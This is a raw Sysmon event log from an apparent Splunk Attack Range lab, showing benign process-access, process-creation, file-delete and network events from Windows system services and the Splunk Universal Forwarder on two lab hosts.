12:24:31.613{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017183Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017182Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017181Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017180Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017179Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017178Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017177Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E4FF-63C7-1402-00000000B002}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017176Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4FF-63C7-1402-00000000B002}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017175Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-E4FF-63C7-1402-00000000B002}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017174Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.168{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1AD7E13D1EB42A88F1B068304E30EF8,SHA256=145C329E65A22DFB8A8DF67D0ECE7EA107DC4CFD6C9A1AC597FC36CA9B43C93F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.528{FE4C2B44-E4FF-63C7-5B06-00000000AF02}33122360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.378{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4FF-63C7-5B06-00000000AF02}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.378{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E4FF-63C7-5B06-00000000AF02}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.378{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4FF-63C7-5B06-00000000AF02}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.379{FE4C2B44-E4FF-63C7-5B06-00000000AF02}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.121{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E97F47CD6E9D0E8473CBE9CD023F5B6B,SHA256=94274256B39A015EE3225C042D24FA9DF0A3C1AA22CB75FDC524CB0D0F1333D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.668{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56389-false10.0.1.12-8000- 23542300x800000000000000044558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.712{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD1601BFF723E69BD7B1B938169B06CA,SHA256=745FB64022A9C545269FACDDE85F1DAB6F03C7ECA7ED5847F56D5764EFFCEEEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017216Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E500-63C7-1602-00000000B002}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017215Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017214Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017213Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017212Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017211Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e